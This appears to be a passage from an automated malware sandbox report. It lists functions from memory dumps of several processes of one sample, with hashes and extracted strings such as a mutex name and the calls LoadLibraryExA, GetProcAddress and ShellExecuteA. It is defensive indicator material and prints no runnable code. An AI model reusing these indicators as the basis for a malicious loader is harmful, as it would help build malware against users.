                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_41_2_7b0000_sedSmibSjDOiaD.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                                                                            • Instruction ID: 132fd60298b3d453a7d1ffdc99194ad216610874b440f940b356353ab4803d87
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C4B13875A002898FEF10CF24CC44BEA77A5FF44304F484925DD09AF2A1D779AA94CF8A

                                                                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                                                                            Function 007B0260 Relevance: 6.3, Strings: 5, Instructions: 52COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000029.00000002.4023037296.00000000007B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_41_2_7b0000_sedSmibSjDOiaD.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$X@$open
                                                                                                                                                                                                                                                                                            • API String ID: 0-1075979870
                                                                                                                                                                                                                                                                                            • Opcode ID: 4be88916d7375141c92d462fa2e6be302d55da5f01b1b4ee245b71dc4840805a
                                                                                                                                                                                                                                                                                            • Instruction ID: d7329239cd406a9790a1c3e2fb17a10ccfcb032649b858e16919ede0bd9ab710
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4be88916d7375141c92d462fa2e6be302d55da5f01b1b4ee245b71dc4840805a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D11DB71244289ABEF10DEA08D4DFEE37A8AB84B05F444415BA09FE0E0DAB59644876B

                                                                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                                                                            Function 012B0005 Relevance: 12.7, Strings: 10, Instructions: 164COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000002A.00000002.4035021990.00000000012B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_42_2_12b0000_sedSmibSjDOiaD.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$X@$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                                                                                                                                                                                                            • API String ID: 0-623675093
                                                                                                                                                                                                                                                                                            • Opcode ID: 0b236e4183e66166baeedc4bb63a439747f50f47959c2c25ea662ca91e6778b3
                                                                                                                                                                                                                                                                                            • Instruction ID: 0f2e3776d4033076f14d080b5f2710a37b7358181f7827b901d9cad2405bc6a7
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b236e4183e66166baeedc4bb63a439747f50f47959c2c25ea662ca91e6778b3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C8614B71650289ABEF12DFA0CC89FEA3778AB04741F440515FB09AE1E0D6B1A6448B6E
                                                                                                                                                                                                                                                                                            Function 012B06D1 Relevance: .3, Instructions: 256COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000002A.00000002.4035021990.00000000012B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_42_2_12b0000_sedSmibSjDOiaD.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                                                                            • Instruction ID: e737fa954271bbed08802db2f39492109d31dc6ac7215e88127e61a609927b2f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 02B12D71A1018A8FEB11CF18CC84BEA77B5FF44344F484925EE09AF2A1D375AA54CB4E

                                                                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                                                                            Function 012B0260 Relevance: 6.3, Strings: 5, Instructions: 52COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000002A.00000002.4035021990.00000000012B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_42_2_12b0000_sedSmibSjDOiaD.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$X@$open
                                                                                                                                                                                                                                                                                            • API String ID: 0-1075979870
                                                                                                                                                                                                                                                                                            • Opcode ID: 4be88916d7375141c92d462fa2e6be302d55da5f01b1b4ee245b71dc4840805a
                                                                                                                                                                                                                                                                                            • Instruction ID: 8c6c4e63ffd4e436156d660442e263b597d48f3d29ed619da9da083a5d0a70d5
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4be88916d7375141c92d462fa2e6be302d55da5f01b1b4ee245b71dc4840805a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 91111B71250289ABFF11DEA48D4DFEE37A8AB84B41F040415BB09FE0E0DAB19244872F

                                                                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                                                                            Function 00790005 Relevance: 12.7, Strings: 10, Instructions: 164COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000002B.00000002.4021611078.0000000000790000.00000040.00000001.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_43_2_790000_sedSmibSjDOiaD.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$X@$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                                                                                                                                                                                                            • API String ID: 0-623675093
                                                                                                                                                                                                                                                                                            • Opcode ID: 0b236e4183e66166baeedc4bb63a439747f50f47959c2c25ea662ca91e6778b3
                                                                                                                                                                                                                                                                                            • Instruction ID: 36495451f2e1cab205963a48d0fca6b329c0a69574f4207b40177a35a2d5fb23
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b236e4183e66166baeedc4bb63a439747f50f47959c2c25ea662ca91e6778b3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0C616C71650288EFEF10DFA0DC4DFAA3768EF04B01F540515EE09BE1F0D6B56A448BAA
                                                                                                                                                                                                                                                                                            Function 007906D1 Relevance: .3, Instructions: 256COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000002B.00000002.4021611078.0000000000790000.00000040.00000001.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_43_2_790000_sedSmibSjDOiaD.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                                                                            • Instruction ID: 6b0e2c75d3dd801917f9a38f67c70baa665accd0734252c6b7e94fa1c932f986
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A6B14871A102898FEF10CF68DC44BA937A5FF54314F484925DD0DAF2A1D379AA94CF8A

                                                                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                                                                            Function 00790260 Relevance: 6.3, Strings: 5, Instructions: 52COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000002B.00000002.4021611078.0000000000790000.00000040.00000001.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_43_2_790000_sedSmibSjDOiaD.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$X@$open
                                                                                                                                                                                                                                                                                            • API String ID: 0-1075979870
                                                                                                                                                                                                                                                                                            • Opcode ID: 4be88916d7375141c92d462fa2e6be302d55da5f01b1b4ee245b71dc4840805a
                                                                                                                                                                                                                                                                                            • Instruction ID: 368369e99cd3e5c999c9dbedc84e3714ec24230aa2039f1eed9259f5ccbc349d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4be88916d7375141c92d462fa2e6be302d55da5f01b1b4ee245b71dc4840805a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C111E71250289AFEF10DFA08D4DFE937A8AB84B01F040414BA09FE0E0DAB59644876B

                                                                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                                                                            Function 00A20005 Relevance: 12.7, Strings: 10, Instructions: 164COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000002C.00000002.4027546869.0000000000A20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_44_2_a20000_sedSmibSjDOiaD.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$X@$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                                                                                                                                                                                                            • API String ID: 0-623675093
                                                                                                                                                                                                                                                                                            • Opcode ID: 0b236e4183e66166baeedc4bb63a439747f50f47959c2c25ea662ca91e6778b3
                                                                                                                                                                                                                                                                                            • Instruction ID: 727736f2e168e0fc029737fde528739f414777a1e1b051b960d1c11a53e2caf8
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b236e4183e66166baeedc4bb63a439747f50f47959c2c25ea662ca91e6778b3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B617D71640298EBEF10DFA4DD89FEA3768EF04701F540525EE09BE1F1D6B166448B2E
                                                                                                                                                                                                                                                                                            Function 00A206D1 Relevance: .3, Instructions: 256COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000002C.00000002.4027546869.0000000000A20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_44_2_a20000_sedSmibSjDOiaD.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                                                                            • Instruction ID: 638dfd9abf0dfeb3af369276e0f79171af5ebdb5cd29c60a33511bb945597714
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1EB14871A002998FEF10CF28DD84BA937A5FF54304F494925DD0DAF2A2D375AA94CF4A

                                                                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                                                                            Function 00A20260 Relevance: 6.3, Strings: 5, Instructions: 52COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000002C.00000002.4027546869.0000000000A20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_44_2_a20000_sedSmibSjDOiaD.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$X@$open
                                                                                                                                                                                                                                                                                            • API String ID: 0-1075979870
                                                                                                                                                                                                                                                                                            • Opcode ID: 4be88916d7375141c92d462fa2e6be302d55da5f01b1b4ee245b71dc4840805a
                                                                                                                                                                                                                                                                                            • Instruction ID: 1688d50a691e2aec2de13eedc09a0724f52944e053894d67ee27aa46a5e1996a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4be88916d7375141c92d462fa2e6be302d55da5f01b1b4ee245b71dc4840805a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2111DE71244289ABEF10DFA48D4DFD937A9AB84B05F444425BF09FE0E0DAB19644876B

                                                                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                                                                            Function 00AD0005 Relevance: 12.7, Strings: 10, Instructions: 164COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000002D.00000002.4030461702.0000000000AD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_45_2_ad0000_sedSmibSjDOiaD.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$X@$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                                                                                                                                                                                                            • API String ID: 0-623675093
                                                                                                                                                                                                                                                                                            • Opcode ID: 0b236e4183e66166baeedc4bb63a439747f50f47959c2c25ea662ca91e6778b3
                                                                                                                                                                                                                                                                                            • Instruction ID: 9445cb2bd60ce45c7eaf2e9520c58c662bb59cb552f153a2d21c80da58ebefba
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b236e4183e66166baeedc4bb63a439747f50f47959c2c25ea662ca91e6778b3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A5616F71640289EBEF10DF60CD49FEA3768EF45701F540516FE0ABE2E0D6B1A6448B5E
                                                                                                                                                                                                                                                                                            Function 00AD06D1 Relevance: .3, Instructions: 256COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000002D.00000002.4030461702.0000000000AD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_45_2_ad0000_sedSmibSjDOiaD.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                                                                            • Instruction ID: 155b0dd85af29994e73804ee146abf41e5f76d27504a1502886be85038dfcaec
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 08B12875A002898FEF10CF24CD44BA937A5FF54304F494926DD0EAF3A1D375AA94CB5A

                                                                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                                                                            Function 00AD0260 Relevance: 6.3, Strings: 5, Instructions: 52COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000002D.00000002.4030461702.0000000000AD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_45_2_ad0000_sedSmibSjDOiaD.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$X@$open
                                                                                                                                                                                                                                                                                            • API String ID: 0-1075979870
                                                                                                                                                                                                                                                                                            • Opcode ID: 4be88916d7375141c92d462fa2e6be302d55da5f01b1b4ee245b71dc4840805a
                                                                                                                                                                                                                                                                                            • Instruction ID: 27d07625a8d293dc96ec76d44bf51b48efd2bc95c8b838ecfad38ac9afd78879
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4be88916d7375141c92d462fa2e6be302d55da5f01b1b4ee245b71dc4840805a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8411DE71244289ABEF10DFA08D4DFDD37A8AB94B05F444415BB0AFE1E0DAB19644876B

                                                                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                                                                            Function 00B90005 Relevance: 12.7, Strings: 10, Instructions: 164COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000002E.00000002.4035478978.0000000000B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_46_2_b90000_sedSmibSjDOiaD.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$X@$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                                                                                                                                                                                                            • API String ID: 0-623675093
                                                                                                                                                                                                                                                                                            • Opcode ID: 0b236e4183e66166baeedc4bb63a439747f50f47959c2c25ea662ca91e6778b3
                                                                                                                                                                                                                                                                                            • Instruction ID: 240e2ef5666cb5b93a9b06a5bfe4546e5b5098e66b02435099bb2a19898a4c4e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b236e4183e66166baeedc4bb63a439747f50f47959c2c25ea662ca91e6778b3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 48616F71650288AFEF10EF60CC89FAA37A8EF04B01F544565FE09BE1F0D6B166448B5A
                                                                                                                                                                                                                                                                                            Function 00B906D1 Relevance: .3, Instructions: 256COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000002E.00000002.4035478978.0000000000B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_46_2_b90000_sedSmibSjDOiaD.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                                                                            • Instruction ID: bbcabdb9d06c0c4eb48eef452401be8fa713c13d8328e3c11823ba990f65179c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B7B15C31A102898FEF10DF68CC84BA937E5FF54314F484865DC0DAF2A1D375AA94CB9A

                                                                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                                                                            Function 00B90260 Relevance: 6.3, Strings: 5, Instructions: 52COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000002E.00000002.4035478978.0000000000B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_46_2_b90000_sedSmibSjDOiaD.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$X@$open
                                                                                                                                                                                                                                                                                            • API String ID: 0-1075979870
                                                                                                                                                                                                                                                                                            • Opcode ID: 4be88916d7375141c92d462fa2e6be302d55da5f01b1b4ee245b71dc4840805a
                                                                                                                                                                                                                                                                                            • Instruction ID: 41cb0db615ea945a8311bbed76d436846bfea1efdf24f9634cdcb2c25593fb7d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4be88916d7375141c92d462fa2e6be302d55da5f01b1b4ee245b71dc4840805a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 05111271250289AFEF10EFA08D4DFE93798DB44B01F040414BA09FD0D0DAB19644872B